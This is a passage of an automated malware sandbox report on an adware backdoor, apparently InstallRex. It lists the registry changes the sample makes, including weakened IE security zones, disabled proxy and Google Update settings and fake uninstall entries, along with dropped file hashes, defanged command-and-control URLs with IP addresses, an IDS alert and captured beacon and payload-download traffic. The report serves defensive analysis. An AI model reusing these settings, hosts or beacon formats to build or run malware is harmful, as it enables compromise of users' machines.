[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:188 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"InstallDate" = "20150509"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"UninstallString" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayName" = "BrrOwsiNGclEarly"

"ProductName" = "BrrOwsiNGclEarly"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 F2 FF CC 16 67 EB 1A 69 B1 07 24 17 C6 05 E8"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"SilentUninstall" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1016 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"ProductName" = "Chime"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"UninstallString" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"InstallDate" = "20150509"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"CategoryName" = "Apps"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoRepair" = "1"

"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 4B B3 27 69 E7 96 8C 9C 2F D3 6F 20 3D 01 25"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"SilentUninstall" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"DisplayName" = "Chime"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 A6 62 68 D8 F2 D2 66 8E 39 88 BD C0 BD DF 21"

The process rundll32.exe:1196 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B3 A7 58 2D 80 17 B5 4A FC 58 61 A2 3F 52 45"

Dropped PE files

MD5 File path
79f9311ac6a5009fef1a5756a0a529d3 c:\Program Files\ActiveCoupon\ActiveCoupon.exe
d6afed6a20c3343acb878ffa399f538b c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll
9f6c52eec607111136cd222b02bf0530 c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe
9f6c52eec607111136cd222b02bf0530 c:\Program Files\Chime\Chime.exe
4277381dbc9bf652805dad7fc0527793 c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.dll
9f6c52eec607111136cd222b02bf0530 c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 289472 289792 5.22326 0b29ab3ccbc000e05e55a97d0cfb232d
.rdata 294912 18878 18944 3.30236 729772da64321bbeffad66bb1b3e1d38
.data 315392 142804 132096 2.08665 2ccbe851032a092ba4bbf57df05bb72d
.rsrc 458752 16120 16384 4.22721 699f51992a29975ccec7d79727813e0b
.reloc 475136 6784 7168 3.47446 fd43122d257222321aa1ceb2a0ee72a3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

hxxp://c1.storesis.com/?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://softwareziip.info/?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 54.68.254.5
hxxp://loveshero.net/?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 54.68.254.5
hxxp://c1.storesis.com/?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99
hxxp://c1.storesis.com/?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 54.69.32.99


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon

Traffic

GET /?e=ressal&sfx=2&cht=0&dd=5&cid=599&vn=159&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:46 GMT
Content-Type: application/octet-stream
Content-Length: 246135
Connection: close
Content-Disposition: attachment; filename="XwPLangqfnEVNV.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 3756
Cache-Control: no-cache

data=KlKoj7SOOXXPYSUMOQaak&report=LrcYUNeDfGeclBotvqQjOCkHvfmyW35 ilZTgk5s4OurWxUKlGaGFT/gViZ6fU/ KQoqmDHf t0nZE0D7tBm0O4yFkfggJnJY1U2hGE8OeU0sW3FxeAuI7wuIk6u6Z5k5HQe3IOCNv9croWS46/bPFRuTo4COD6JuHAUFQEj8Lplqx5zbWq3kX31JDpnF6 m3AOOiFEFGCZNoAl0yWB8tda57ofh687ARHaIqDsSwINy9Cw7K9ukxIFAlnY9LIjwqhILXO2fCsYPyYizaYtN L/ajGCP1J1zj3fhJQMbIZuoIwEQMZ4gNzrgz6uCBFDBjycb6wgvcLgmwzWvo8FSen1mYXltqtv2XKqb5DtPKUmd8fOaE0IWxE2yh8YzV1m8VRPKpPeDCyKVwK4qC3iF1F CqdEup1JwonXt TsukkoRVDxpr0KOA3zpUT5aXnMzkpeZt/urTinhwKze2MvCDtDgYOuyeyWfkrzw15gigj/qO4CL1dpNodsx9dS1I8yIpwmDzAoNUk FzmI1SF/Z/i2ovWMMGgW5yGaE6W2UQxcTjQyXMa iztypcQX56gntlvsjU7IuP/myFE58vrYns0jrIaSDwIJEQn QcRLyd5IJgAkslSdXbQwPiJ82Cc9TQalGbr9HrbySfTOomzSZVJ1fCmD6St6iFQOLoglBpdRsDfgsklkw3ypKNApvaPnX5d7dBcv4HjmUpAP0 0WGonSoeSJnrtAsvajjwoJQNtuGvNtF2IGyG2K8mBx/Gaa I1rplUsaJNbZSxJt/311vHvCRSUog1HeFd7RcatechXK5DH7NtuPl6KmUcsDna m65l1nJBhDoZKGN8Tx/3Qyp/Mo Qevk1TlAdos9wSNcR/N0anngSE0AMQED fWo0HO3746k7roNaAYC0EBtYj6rFy91Qo75FLcsyp9X5b5pwCJmx1apomL326wDdjwvxfbt7MFoyJjhxNcY214yYZg9l4ooNhMc2CjOQQ/w HuolShQhErKaLj VTRXws3K7qYkYDF6Z mwu56VcA2eND5nr2kNEJZKp7slM0oy7KhHUXffOzxBmaWPscgPUGKjE4xNwIL9/NwLzsoZPfTOEY9NZfg5I2qzLBxh4kU9gZsoQBt3V3eYDcwZkilzEKIkeG8v9C1hxYMuODWs  ZIhdyYPCFpcUsbbEBZPcZUhzMqc8N4JjKbmOZRZwIyQNdgu5lmB6TW2UOBI42r0Y/VvmaxOICqnO 8t7HYallKzwDkFNoYsATz7/VVtIu07
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:30 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}


GET /?step_id=3&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:25 GMT
Content-Type: text/html
Content-Length: 9774
Connection: close
Content-Disposition: attachment; filename="3.txt"

<<< skipped >>>

GET /?step_id=2&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:16 GMT
Content-Type: text/html
Content-Length: 9746
Connection: close
Content-Disposition: attachment; filename="2.txt"

<<< skipped >>>

GET /?e=dnkp&dd=23&emnum=53&jc=1&sfx=2&ams=6&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: softwareziip.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:27 GMT
Content-Type: application/octet-stream
Content-Length: 450664
Connection: close
Content-Disposition: attachment; filename="Oo8yOHF14wFvBA.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

GET /?step_id=5&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:45 GMT
Content-Type: text/html
Content-Length: 9922
Connection: close
Content-Disposition: attachment; filename="5.txt"

<<< skipped >>>

POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 3807
Cache-Control: no-cache

